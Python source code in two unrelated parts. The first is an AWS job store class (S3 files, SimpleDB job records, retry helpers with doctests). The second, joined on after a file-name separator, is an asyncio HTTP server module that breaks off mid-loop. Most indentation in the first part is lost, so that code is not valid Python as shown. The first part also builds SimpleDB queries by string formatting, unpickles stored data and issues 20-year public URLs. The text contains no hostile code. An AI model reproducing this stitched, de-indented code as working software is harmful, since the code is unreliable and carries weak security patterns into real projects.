# FIXME: Command length is currently limited to 1024 characters
# FIXME: Passing in both headers and validate=False caused BotoClientError: When providing 'validate=False', no other
# params are allowed. Solution, validate=False was removed completely, but could potentially be passed if not encrypting
# NB: Number of messages per job is limited to 256-x, 1024 bytes each, with x being the number of
# other attributes in the item
# FIXME: enforce SimpleDB limits early
class AWSJobStore(AbstractJobStore):
"""
A job store that uses Amazon's S3 for file storage and SimpleDB for storing job info and enforcing strong
consistency on the S3 file storage. There will be SDB domains for jobs and versions and versioned S3 buckets for
files and stats. The content of files and stats are stored as keys on the respective bucket while the latest
version of a key is stored in the versions SDB domain. Job objects are pickled, compressed, partitioned into
    chunks of 1024 bytes and each chunk is stored as an attribute of the SDB item representing the job. UUIDs are
used to identify jobs and files.
"""
def fileExists(self, jobStoreFileID):
return bool(self.versions.get_item(item_name=jobStoreFileID, consistent_read=True))
def jobs(self):
result = None
for attempt in retry_sdb():
with attempt:
result = list(self.jobDomain.select(
query="select * from `{domain}` ".format(domain=self.jobDomain.name),
consistent_read=True))
assert result is not None
for jobItem in result:
yield AWSJob.fromItem(jobItem)
def create(self, command, memory, cores, disk, updateID=None,
predecessorNumber=0):
jobStoreID = self._newJobID()
log.debug("Creating job %s for '%s'",
jobStoreID, '<no command>' if command is None else command)
job = AWSJob(jobStoreID=jobStoreID,
command=command, memory=memory, cores=cores, disk=disk,
remainingRetryCount=self._defaultTryCount(), logJobStoreFileID=None,
updateID=updateID, predecessorNumber=predecessorNumber)
for attempt in retry_sdb():
with attempt:
assert self.jobDomain.put_attributes(item_name=jobStoreID,
attributes=job.toItem())
return job
def __init__(self, region, namePrefix, config=None):
"""
Create a new job store in AWS or load an existing one from there.
:param region: the AWS region to create the job store in, e.g. 'us-west-2'
:param namePrefix: S3 bucket names and SDB tables will be prefixed with this
        :param config: the config object to be written to this job store. Must be None for existing
job stores. Must not be None for new job stores.
"""
log.debug("Instantiating %s for region %s and name prefix '%s'",
self.__class__, region, namePrefix)
self.region = region
self.namePrefix = namePrefix
self.jobDomain = None
self.versions = None
self.files = None
self.stats = None
self.db = self._connectSimpleDB()
self.s3 = self._connectS3()
self.sseKey = None
# Check global registry domain for existence of this job store. The first time this is
# being executed in an AWS account, the registry domain will be created on the fly.
create = config is not None
self.registry_domain = self._getOrCreateDomain('toil-registry')
for attempt in retry_sdb():
with attempt:
attributes = self.registry_domain.get_attributes(item_name=namePrefix,
attribute_name='exists',
consistent_read=True)
exists = parse_bool(attributes.get('exists', str(False)))
self._checkJobStoreCreation(create, exists, region + ":" + namePrefix)
self.jobDomain = self._getOrCreateDomain(self.qualify('jobs'))
self.versions = self._getOrCreateDomain(self.qualify('versions'))
self.files = self._getOrCreateBucket(self.qualify('files'), versioning=True)
self.stats = self._getOrCreateBucket(self.qualify('stats'), versioning=True)
# Now register this job store
for attempt in retry_sdb():
with attempt:
self.registry_domain.put_attributes(item_name=namePrefix,
attributes=dict(exists='True'))
super(AWSJobStore, self).__init__(config=config)
if self.config.sseKey is not None:
with open(self.config.sseKey) as f:
self.sseKey = f.read()
def qualify(self, name):
return self.namePrefix + self.nameSeparator + name
def exists(self, jobStoreID):
for attempt in retry_sdb():
with attempt:
return bool(self.jobDomain.get_attributes(item_name=jobStoreID,
attribute_name=[],
consistent_read=True))
def getPublicUrl(self, jobStoreFileID):
"""
For Amazon SimpleDB requests, use HTTP GET requests that are URLs with query strings.
http://awsdocs.s3.amazonaws.com/SDB/latest/sdb-dg.pdf
Create url, check if valid, return.
Encrypted file urls are currently not supported
"""
key = self.files.get_key(key_name=jobStoreFileID)
# There should be no practical upper limit on when a job is allowed to access a public
# URL so we set the expiration to 20 years.
return key.generate_url(expires_in=60 * 60 * 24 * 365 * 20)
def getSharedPublicUrl(self, FileName):
jobStoreFileID = self._newFileID(FileName)
return self.getPublicUrl(jobStoreFileID)
def load(self, jobStoreID):
# TODO: check if mentioning individual attributes is faster than using *
result = None
for attempt in retry_sdb():
with attempt:
result = list(self.jobDomain.select(
query="select * from `{domain}` "
"where itemName() = '{jobStoreID}'".format(domain=self.jobDomain.name,
jobStoreID=jobStoreID),
consistent_read=True))
assert result is not None
if len(result) != 1:
raise NoSuchJobException(jobStoreID)
job = AWSJob.fromItem(result[0])
if job is None:
raise NoSuchJobException(jobStoreID)
log.debug("Loaded job %s", jobStoreID)
return job
def update(self, job):
log.debug("Updating job %s", job.jobStoreID)
for attempt in retry_sdb():
with attempt:
assert self.jobDomain.put_attributes(item_name=job.jobStoreID,
attributes=job.toItem())
items_per_batch_delete = 25
def delete(self, jobStoreID):
        # Remove the job item and then delete any files registered under this jobStoreID.
log.debug("Deleting job %s", jobStoreID)
for attempt in retry_sdb():
with attempt:
self.jobDomain.delete_attributes(item_name=jobStoreID)
items = None
for attempt in retry_sdb():
with attempt:
items = list(self.versions.select(
query="select * from `%s` "
"where jobStoreID='%s'" % (self.versions.name, jobStoreID),
consistent_read=True))
assert items is not None
if items:
log.debug("Deleting %d file(s) associated with job %s", len(items), jobStoreID)
n = self.items_per_batch_delete
batches = [items[i:i + n] for i in range(0, len(items), n)]
for batch in batches:
for attempt in retry_sdb():
with attempt:
self.versions.batch_delete_attributes({item.name: None for item in batch})
for item in items:
if 'version' in item:
self.files.delete_key(key_name=item.name,
version_id=item['version'])
else:
self.files.delete_key(key_name=item.name)
def writeFile(self, localFilePath, jobStoreID=None):
jobStoreFileID = self._newFileID()
firstVersion = self._upload(jobStoreFileID, localFilePath)
self._registerFile(jobStoreFileID, jobStoreID=jobStoreID, newVersion=firstVersion)
log.debug("Wrote initial version %s of file %s for job %s from path '%s'",
firstVersion, jobStoreFileID, jobStoreID, localFilePath)
return jobStoreFileID
@contextmanager
def writeFileStream(self, jobStoreID=None):
jobStoreFileID = self._newFileID()
with self._uploadStream(jobStoreFileID, self.files) as (writable, key):
yield writable, jobStoreFileID
firstVersion = key.version_id
assert firstVersion is not None
self._registerFile(jobStoreFileID, jobStoreID=jobStoreID, newVersion=firstVersion)
log.debug("Wrote initial version %s of file %s for job %s",
firstVersion, jobStoreFileID, jobStoreID)
@contextmanager
def writeSharedFileStream(self, sharedFileName, isProtected=True):
assert self._validateSharedFileName(sharedFileName)
jobStoreFileID = self._newFileID(sharedFileName)
oldVersion = self._getFileVersion(jobStoreFileID)
with self._uploadStream(jobStoreFileID, self.files,
encrypted=isProtected) as (writable, key):
yield writable
newVersion = key.version_id
jobStoreId = str(self.sharedFileJobID) if oldVersion is None else None
self._registerFile(jobStoreFileID,
jobStoreID=jobStoreId, oldVersion=oldVersion, newVersion=newVersion)
if oldVersion is None:
log.debug("Wrote initial version %s of shared file %s (%s)",
newVersion, sharedFileName, jobStoreFileID)
else:
log.debug("Wrote version %s of file %s (%s), replacing version %s",
newVersion, sharedFileName, jobStoreFileID, oldVersion)
def updateFile(self, jobStoreFileID, localFilePath):
oldVersion = self._getFileVersion(jobStoreFileID)
newVersion = self._upload(jobStoreFileID, localFilePath)
self._registerFile(jobStoreFileID, oldVersion=oldVersion, newVersion=newVersion)
log.debug("Wrote version %s of file %s from path '%s', replacing version %s",
newVersion, jobStoreFileID, localFilePath, oldVersion)
@contextmanager
def updateFileStream(self, jobStoreFileID):
oldVersion = self._getFileVersion(jobStoreFileID)
with self._uploadStream(jobStoreFileID, self.files) as (writable, key):
yield writable
newVersion = key.version_id
self._registerFile(jobStoreFileID, oldVersion=oldVersion, newVersion=newVersion)
log.debug("Wrote version %s of file %s, replacing version %s",
newVersion, jobStoreFileID, oldVersion)
def readFile(self, jobStoreFileID, localFilePath):
version = self._getFileVersion(jobStoreFileID)
if version is None: raise NoSuchFileException(jobStoreFileID)
log.debug("Reading version %s of file %s to path '%s'",
version, jobStoreFileID, localFilePath)
self._download(jobStoreFileID, localFilePath, version)
@contextmanager
def readFileStream(self, jobStoreFileID):
version = self._getFileVersion(jobStoreFileID)
if version is None: raise NoSuchFileException(jobStoreFileID)
log.debug("Reading version %s of file %s", version, jobStoreFileID)
with self._downloadStream(jobStoreFileID, version, self.files) as readable:
yield readable
@contextmanager
def readSharedFileStream(self, sharedFileName, isProtected=True):
assert self._validateSharedFileName(sharedFileName)
jobStoreFileID = self._newFileID(sharedFileName)
version = self._getFileVersion(jobStoreFileID)
if version is None: raise NoSuchFileException(jobStoreFileID)
log.debug("Read version %s from shared file %s (%s)",
version, sharedFileName, jobStoreFileID)
with self._downloadStream(jobStoreFileID, version, self.files,
encrypted=isProtected) as readable:
yield readable
def deleteFile(self, jobStoreFileID):
version, bucket = self._getFileVersionAndBucket(jobStoreFileID)
if bucket:
for attempt in retry_sdb():
with attempt:
if version:
self.versions.delete_attributes(jobStoreFileID,
expected_values=['version', version])
else:
self.versions.delete_attributes(jobStoreFileID)
bucket.delete_key(key_name=jobStoreFileID, version_id=version)
if version:
log.debug("Deleted version %s of file %s", version, jobStoreFileID)
else:
log.debug("Deleted unversioned file %s", jobStoreFileID)
else:
log.debug("File %s does not exist", jobStoreFileID)
def getEmptyFileStoreID(self, jobStoreID=None):
jobStoreFileID = self._newFileID()
self._registerFile(jobStoreFileID, jobStoreID=jobStoreID)
log.debug("Registered empty file %s for job %s", jobStoreFileID, jobStoreID)
return jobStoreFileID
def writeStatsAndLogging(self, statsAndLoggingString):
jobStoreFileId = self._newFileID()
with self._uploadStream(jobStoreFileId, self.stats, multipart=False) as (writeable, key):
writeable.write(statsAndLoggingString)
firstVersion = key.version_id
self._registerFile(jobStoreFileId, bucketName='stats', newVersion=firstVersion)
def readStatsAndLogging(self, statsCallBackFn):
itemsProcessed = 0
items = None
for attempt in retry_sdb():
with attempt:
items = list(self.versions.select(
query="select * from `%s` "
"where bucketName='stats'" % (self.versions.name,),
consistent_read=True))
assert items is not None
for item in items:
with self._downloadStream(item.name, item['version'], self.stats) as readable:
statsCallBackFn(readable)
self.deleteFile(item.name)
itemsProcessed += 1
return itemsProcessed
# Dots in bucket names should be avoided because bucket names are used in HTTPS bucket
    # URLs where they may interfere with the certificate common name. We use a double
# underscore as a separator instead.
bucketNameRe = re.compile(r'^[a-z0-9][a-z0-9-]+[a-z0-9]$')
nameSeparator = '--'
@classmethod
def _parseArgs(cls, jobStoreString):
region, namePrefix = jobStoreString.split(':')
# See http://docs.aws.amazon.com/AmazonS3/latest/dev/BucketRestrictions.html,
# reserve 10 characters for separator and suffixes
if not cls.bucketNameRe.match(namePrefix):
raise ValueError("Invalid name prefix '%s'. Name prefixes must contain only digits, "
"hyphens or lower-case letters and must not start or end in a "
"hyphen." % namePrefix)
# reserve 13 for separator and suffix
if len(namePrefix) > 50:
raise ValueError("Invalid name prefix '%s'. Name prefixes may not be longer than 50 "
"characters." % namePrefix)
if '--' in namePrefix:
raise ValueError("Invalid name prefix '%s'. Name prefixes may not contain "
"%s." % (namePrefix, cls.nameSeparator))
return region, namePrefix
def _connectSimpleDB(self):
"""
        :rtype: SDBConnection
"""
db = boto.sdb.connect_to_region(self.region)
if db is None:
raise ValueError("Could not connect to SimpleDB. Make sure '%s' is a valid SimpleDB "
"region." % self.region)
assert db is not None
return db
def _connectS3(self):
"""
:rtype: S3Connection
"""
s3 = boto.s3.connect_to_region(self.region)
if s3 is None:
raise ValueError("Could not connect to S3. Make sure '%s' is a valid S3 region." %
self.region)
return s3
def _getOrCreateBucket(self, bucket_name, versioning=False):
"""
        :rtype: Bucket
"""
assert self.bucketNameRe.match(bucket_name)
assert 3 <= len(bucket_name) <= 63
try:
bucket = self.s3.get_bucket(bucket_name, validate=True)
assert versioning is self.__getBucketVersioning(bucket)
return bucket
except S3ResponseError as e:
if e.error_code == 'NoSuchBucket':
bucket = self.s3.create_bucket(bucket_name, location=self.region)
if versioning:
bucket.configure_versioning(versioning)
return bucket
else:
raise
def _getOrCreateDomain(self, domain_name):
"""
Return the boto Domain object representing the SDB domain with the given name. If the
domain does not exist it will be created.
:param domain_name: the unqualified name of the domain to be created
:rtype : Domain
"""
try:
return self.db.get_domain(domain_name)
except SDBResponseError as e:
if no_such_domain(e):
for attempt in retry_sdb(retry_while=sdb_unavailable):
with attempt:
return self.db.create_domain(domain_name)
else:
raise
def _newJobID(self):
return str(uuid.uuid4())
# A dummy job ID under which all shared files are stored.
sharedFileJobID = uuid.UUID('891f7db6-e4d9-4221-a58e-ab6cc4395f94')
def _newFileID(self, sharedFileName=None):
if sharedFileName is None:
return str(uuid.uuid4())
else:
return str(uuid.uuid5(self.sharedFileJobID, str(sharedFileName)))
def _getFileVersionAndBucket(self, jobStoreFileID):
"""
:rtype: tuple(str version, AWS bucket)
"""
item = None
for attempt in retry_sdb():
with attempt:
item = self.versions.get_attributes(item_name=jobStoreFileID,
attribute_name=['version', 'bucketName'],
consistent_read=True)
assert item is not None
bucketName = item.get('bucketName')
if bucketName is None:
return None, None
else:
# noinspection PyTypeChecker
return item.get('version'), getattr(self, bucketName)
def _getFileVersion(self, jobStoreFileID, expectedBucket=None):
version, bucket = self._getFileVersionAndBucket(jobStoreFileID)
if bucket is None:
assert version is None
else:
if expectedBucket is None:
expectedBucket = self.files
assert bucket is expectedBucket
return version
_s3_part_size = 50 * 1024 * 1024
def _upload(self, jobStoreFileID, localFilePath):
file_size, file_time = self._fileSizeAndTime(localFilePath)
headers = {}
self.__add_encryption_headers(headers)
if file_size <= self._s3_part_size:
key = self.files.new_key(key_name=jobStoreFileID)
key.name = jobStoreFileID
key.set_contents_from_filename(localFilePath, headers=headers)
version = key.version_id
else:
with open(localFilePath, 'rb') as f:
upload = self.files.initiate_multipart_upload(key_name=jobStoreFileID,
headers=headers)
try:
start = 0
part_num = itertools.count()
while start < file_size:
end = min(start + self._s3_part_size, file_size)
assert f.tell() == start
upload.upload_part_from_file(fp=f,
part_num=next(part_num) + 1,
size=end - start,
headers=headers)
start = end
assert f.tell() == file_size == start
except:
upload.cancel_upload()
raise
else:
version = upload.complete_upload().version_id
key = self.files.get_key(jobStoreFileID, headers=headers)
assert key.size == file_size
            # Make reasonably sure that the file wasn't touched during the upload
assert self._fileSizeAndTime(localFilePath) == (file_size, file_time)
return version
@contextmanager
def _uploadStream(self, jobStoreFileID, bucket, multipart=True, encrypted=True):
key = bucket.new_key(key_name=jobStoreFileID)
assert key.version_id is None
readable_fh, writable_fh = os.pipe()
headers = {}
if encrypted:
self.__add_encryption_headers(headers)
with os.fdopen(readable_fh, 'r') as readable:
with os.fdopen(writable_fh, 'w') as writable:
def reader():
try:
upload = bucket.initiate_multipart_upload(key_name=jobStoreFileID,
headers=headers)
try:
for part_num in itertools.count():
                        # FIXME: Consider using key.set_contents_from_stream and ripping
                        # FIXME: ... the query_args logic from upload_part_from_file in
                        # FIXME: ... MultipartUpload. Possible downside is that implicit
                        # FIXME: ... retries won't work.
buf = readable.read(self._s3_part_size)
# There must be at least one part, even if the file is empty.
if len(buf) == 0 and part_num > 0: break
upload.upload_part_from_file(fp=StringIO(buf),
# S3 part numbers are 1-based
part_num=part_num + 1, headers=headers)
if len(buf) == 0: break
except:
upload.cancel_upload()
raise
else:
key.version_id = upload.complete_upload().version_id
except:
log.exception('Exception in reader thread')
def simpleReader():
log.debug("Using single part upload")
try:
buf = StringIO(readable.read())
assert key.set_contents_from_file(fp=buf, headers=headers) == buf.len
except:
log.exception("Exception in simple reader thread")
thread = Thread(target=reader if multipart else simpleReader)
thread.start()
# Yield the key now with version_id unset. When reader() returns
# key.version_id will be set.
yield writable, key
# The writable is now closed. This will send EOF to the readable and cause that
# thread to finish.
thread.join()
assert key.version_id is not None
def _download(self, jobStoreFileID, localFilePath, version):
headers = {}
self.__add_encryption_headers(headers)
key = self.files.get_key(jobStoreFileID, headers=headers)
key.get_contents_to_filename(localFilePath, version_id=version, headers=headers)
@contextmanager
def _downloadStream(self, jobStoreFileID, version, bucket, encrypted=True):
headers = {}
if encrypted:
self.__add_encryption_headers(headers)
key = bucket.get_key(jobStoreFileID, headers=headers)
readable_fh, writable_fh = os.pipe()
with os.fdopen(readable_fh, 'r') as readable:
with os.fdopen(writable_fh, 'w') as writable:
def writer():
key.get_contents_to_file(writable, headers=headers, version_id=version)
# This close() will send EOF to the reading end and ultimately cause the
                    # yield to return. It also makes the implicit .close() done by the enclosing
                    # "with" context redundant, but that should be OK since .close() on file
                    # objects is idempotent.
writable.close()
thread = Thread(target=writer)
thread.start()
yield readable
thread.join()
def _registerFile(self, jobStoreFileID,
bucketName='files', jobStoreID=None, newVersion=None, oldVersion=None):
"""
        Register a file in the store.
:param jobStoreFileID: the file's ID, mandatory
:param bucketName: the name of the S3 bucket the file was placed in
:param jobStoreID: optional ID of the job owning the file, only allowed for first version of
file
:param newVersion: the file's new version or None if the file is to be registered without
content, in which case jobStoreId must be passed
:param oldVersion: the expected previous version of the file or None if newVersion is the
first version or file is registered without content
"""
# Must pass newVersion if passing oldVersion
assert oldVersion is None or newVersion is not None
attributes = dict(bucketName=bucketName)
if newVersion is not None:
attributes['version'] = newVersion
if jobStoreID is not None:
attributes['jobStoreID'] = jobStoreID
# False stands for absence
expected = ['version', False if oldVersion is None else oldVersion]
try:
for attempt in retry_sdb():
with attempt:
assert self.versions.put_attributes(item_name=jobStoreFileID,
attributes=attributes,
expected_value=expected)
if oldVersion is not None:
bucket = getattr(self, bucketName)
bucket.delete_key(jobStoreFileID, version_id=oldVersion)
except SDBResponseError as e:
if e.error_code == 'ConditionalCheckFailed':
raise ConcurrentFileModificationException(jobStoreFileID)
else:
raise
def _fileSizeAndTime(self, localFilePath):
file_stat = os.stat(localFilePath)
file_size, file_time = file_stat.st_size, file_stat.st_mtime
return file_size, file_time
versionings = dict(Enabled=True, Disabled=False, Suspended=None)
def __getBucketVersioning(self, bucket):
"""
        A valuable lesson in how to feck up a simple tri-state boolean.
For newly created buckets get_versioning_status returns None. We map that to False.
TBD: This may actually be a result of eventual consistency
Otherwise, the 'Versioning' entry in the dictionary returned by get_versioning_status can
be 'Enabled', 'Suspended' or 'Disabled' which we map to True, None and False
respectively. Calling configure_versioning with False on a bucket will cause
get_versioning_status to then return 'Suspended' for some reason.
"""
status = bucket.get_versioning_status()
return bool(status) and self.versionings[status['Versioning']]
def __add_encryption_headers(self, headers):
if self.sseKey is not None:
self._add_encryption_headers(self.sseKey, headers)
def deleteJobStore(self):
self.registry_domain.put_attributes(self.namePrefix, dict(exists=str(False)))
for bucket in (self.files, self.stats):
if bucket is not None:
for upload in bucket.list_multipart_uploads():
upload.cancel_upload()
if self.__getBucketVersioning(bucket) in (True, None):
for key in list(bucket.list_versions()):
bucket.delete_key(key.name, version_id=key.version_id)
else:
for key in list(bucket.list()):
key.delete()
bucket.delete()
for domain in (self.versions, self.jobDomain):
if domain is not None:
domain.delete()
@staticmethod
def _add_encryption_headers(sse_key, headers):
assert len(sse_key) == 32
encoded_sse_key = base64.b64encode(sse_key)
encoded_sse_key_md5 = base64.b64encode(hashlib.md5(sse_key).digest())
headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
headers['x-amz-server-side-encryption-customer-key'] = encoded_sse_key
headers['x-amz-server-side-encryption-customer-key-md5'] = encoded_sse_key_md5
class AWSJob(JobWrapper):
"""
A Job that can be converted to and from a SimpleDB Item
"""
@classmethod
def fromItem(cls, item):
"""
:type item: Item
:rtype: AWSJob
"""
chunkedJob = item.items()
chunkedJob.sort()
if len(chunkedJob) == 1:
# First element of list = tuple, second element of tuple = serialized job
wholeJobString = chunkedJob[0][1]
else:
wholeJobString = ''.join(item[1] for item in chunkedJob)
return cPickle.loads(bz2.decompress(base64.b64decode(wholeJobString)))
def toItem(self):
"""
:rtype: Item
"""
item = {}
serializedAndEncodedJob = base64.b64encode(bz2.compress(cPickle.dumps(self)))
# this convoluted expression splits the string into chunks of 1024 - the max value for an attribute in SDB
jobChunks = [serializedAndEncodedJob[i:i + 1024]
for i in range(0, len(serializedAndEncodedJob), 1024)]
for attributeOrder, chunk in enumerate(jobChunks):
item[str(attributeOrder).zfill(3)] = chunk
return item
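# Round-trip sketch (illustrative, not part of the original file): toItem()
# base64-encodes the bz2-compressed pickle of the job and splits it into
# 1024-character chunks keyed '000', '001', ..., while fromItem() re-joins the
# chunks in key order before decoding, decompressing and unpickling, e.g.
#
#     item = job.toItem()              # {'000': 'QlpoOT...', '001': ...}
#     same_job = AWSJob.fromItem(item)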
# FIXME: This was lifted from cgcloud-lib where we use it for EC2 retries. The only difference
# FIXME: ... between that code and this is the name of the exception.
a_short_time = 5
a_long_time = 60 * 60
def no_such_domain(e):
return isinstance(e, SDBResponseError) and e.error_code.endswith('NoSuchDomain')
def sdb_unavailable(e):
return e.__class__ == BotoServerError and e.status.startswith("503")
def true(_):
return True
def false(_):
return False
def retry_sdb(retry_after=a_short_time,
retry_for=10 * a_short_time,
retry_while=no_such_domain):
"""
Retry an SDB operation while the failure matches a given predicate and until a given timeout
expires, waiting a given amount of time in between attempts. This function is a generator
that yields contextmanagers. See doctests below for example usage.
:param retry_after: the delay in seconds between attempts
:param retry_for: the timeout in seconds.
:param retry_while: a callable with one argument, an instance of SDBResponseError, returning
True if another attempt should be made or False otherwise
:return: a generator yielding contextmanagers
Retry for a limited amount of time:
>>> i = 0
>>> for attempt in retry_sdb( retry_after=0, retry_for=.1, retry_while=true ):
... with attempt:
... i += 1
... raise SDBResponseError( 'foo', 'bar' )
Traceback (most recent call last):
...
SDBResponseError: SDBResponseError: foo bar
<BLANKLINE>
>>> i > 1
True
Do exactly one attempt:
>>> i = 0
>>> for attempt in retry_sdb( retry_for=0 ):
... with attempt:
... i += 1
... raise SDBResponseError( 'foo', 'bar' )
Traceback (most recent call last):
...
SDBResponseError: SDBResponseError: foo bar
<BLANKLINE>
>>> i
1
    Don't retry on success:
>>> i = 0
>>> for attempt in retry_sdb( retry_after=0, retry_for=.1, retry_while=true ):
... with attempt:
... i += 1
>>> i
1
    Don't retry unless the retry_while predicate returns True:
>>> i = 0
>>> for attempt in retry_sdb( retry_after=0, retry_for=.1, retry_while=false ):
... with attempt:
... i += 1
... raise SDBResponseError( 'foo', 'bar' )
Traceback (most recent call last):
...
SDBResponseError: SDBResponseError: foo bar
<BLANKLINE>
>>> i
1
"""
if retry_for > 0:
go = [None]
@contextmanager
def repeated_attempt():
try:
yield
except BotoServerError as e:
if time.time() + retry_after < expiration:
if retry_while(e):
log.info('... got %s, trying again in %is ...', e.error_code, retry_after)
time.sleep(retry_after)
else:
log.info('Exception failed predicate, giving up.')
raise
else:
log.info('Retry timeout expired, giving up.')
raise
else:
go.pop()
expiration = time.time() + retry_for
while go:
yield repeated_attempt()
else:
@contextmanager
def single_attempt():
yield
yield single_attempt()
def parse_bool(s):
if s == 'True':
return True
elif s == 'False':
return False
else:
raise ValueError(s)
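# Usage sketch (illustrative, not part of the original file): a job store
# locator of the form '<region>:<namePrefix>' is split by _parseArgs and the
# resulting pair passed to the constructor; config must be non-None only when
# creating a new job store.
#
#     region, prefix = AWSJobStore._parseArgs('us-west-2:my-toil-run')
#     store = AWSJobStore(region, prefix, config=None)   # attach to an existing store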
|
server.py
|
# -*- coding: utf-8 -*-
import asyncio
import multiprocessing
import os
from functools import partial
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from xTool.log.log import logger
from xTool.utils.processes import ctrlc_workaround_for_windows
from xTool.misc import OS_IS_WINDOWS
from xTool.aiomisc import load_uvlopo
from xTool.servers.protocols.http_protocol import HttpProtocol
from xTool.servers.trigger import trigger_events
from xTool.servers.signal import Signal
load_uvlopo()
class AsyncioServer:
"""
Wraps an asyncio server with functionality that might be useful to
a user who needs to manage the server lifecycle manually.
"""
__slots__ = (
"loop",
"serve_coro",
"_after_start",
"_before_stop",
"_after_stop",
"server",
"connections",
)
def __init__(
self,
loop,
serve_coro,
connections,
after_start,
before_stop,
after_stop,
):
# Note, Sanic already called "before_server_start" events
# before this helper was even created. So we don't need it here.
self.loop = loop
self.serve_coro = serve_coro
self._after_start = after_start
self._before_stop = before_stop
self._after_stop = after_stop
self.server = None
self.connections = connections
def after_start(self):
"""Trigger "after_server_start" events"""
trigger_events(self._after_start, self.loop)
def before_stop(self):
"""Trigger "before_server_stop" events"""
trigger_events(self._before_stop, self.loop)
def after_stop(self):
"""Trigger "after_server_stop" events"""
trigger_events(self._after_stop, self.loop)
def is_serving(self):
"""判断服务器是否已经启动 ."""
if self.server:
return self.server.is_serving()
return False
def wait_closed(self):
if self.server:
return self.server.wait_closed()
def close(self):
"""关闭服务器 ."""
if self.server:
            # Close the underlying asyncio server
self.server.close()
            # Schedule a task that waits for the server to finish closing
coro = self.wait_closed()
task = asyncio.ensure_future(coro, loop=self.loop)
return task
def start_serving(self):
"""启动服务器 ."""
if self.server:
try:
return self.server.start_serving()
except AttributeError:
raise NotImplementedError(
"server.start_serving not available in this version "
"of asyncio or uvloop."
)
def serve_forever(self):
if self.server:
try:
return self.server.serve_forever()
except AttributeError:
raise NotImplementedError(
"server.serve_forever not available in this version "
"of asyncio or uvloop."
)
def __await__(self):
"""Starts the asyncio server, returns AsyncServerCoro"""
task = asyncio.ensure_future(self.serve_coro)
        # Wait for the serve task to complete
while not task.done():
yield
        # Retrieve the task's result (the underlying asyncio server)
self.server = task.result()
        # Return this AsyncioServer wrapper
return self
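# Usage sketch (illustrative, not part of the original file): with
# run_async=True the serve() function below returns an AsyncioServer that can
# be awaited from an already running event loop, e.g.
#
#     srv = await serve(host, port, app, run_async=True, loop=loop)
#     srv.after_start()          # fire "after_server_start" events
#     ...
#     await srv.close()          # close and wait for shutdown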
def serve(
host,
port,
app,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
ssl=None,
sock=None,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
state=None,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param run_async: bool: Do not create a new event loop for the server,
and return an AsyncServer object rather than running it
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if app.debug:
loop.set_debug(app.debug)
app.asgi = False
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
app=app,
state=state,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
    # Create the HTTP server coroutine
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs,
)
if run_async:
return AsyncioServer(
loop=loop,
serve_coro=server_coroutine,
connections=connections,
after_start=after_start,
before_stop=before_stop,
after_stop=after_stop,
)
trigger_events(before_start, loop)
    # Run the server coroutine to obtain the HTTP server
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
    # Post-start initialization
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
    # Register signals for graceful termination
if register_sys_signals:
if OS_IS_WINDOWS:
            # Windows workaround for handling Ctrl-C (SIGINT)
ctrlc_workaround_for_windows(app)
else:
for _signal in [SIGTERM] if run_multiple else [SIGINT, SIGTERM]:
loop.add_signal_handler(_signal, app.stop)
    # Current worker process ID
pid = os.getpid()
    # Run the HTTP server
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
        # Graceful shutdown timeout.
        # We should honour graceful_shutdown_timeout instead of letting
        # connections hang forever.
        # Roughly track the elapsed time.
graceful = app.config.GRACEFUL_SHUTDOWN_TIMEOUT
start_shutdown = 0
while connections and (start_shutdown < graceful):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
        # Force-close non-idle connections after waiting for
        # graceful_shutdown_timeout
        coros = []
        for conn in connections:
            if hasattr(conn, "websocket") and conn.websocket:
                coros.append(conn.websocket.close_connection())
            else:
                conn.close()
        _shutdown = asyncio.gather(*coros)
        loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
processes = []
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
mp = multiprocessing.get_context("fork")
    # Start the worker processes
for _ in range(workers):
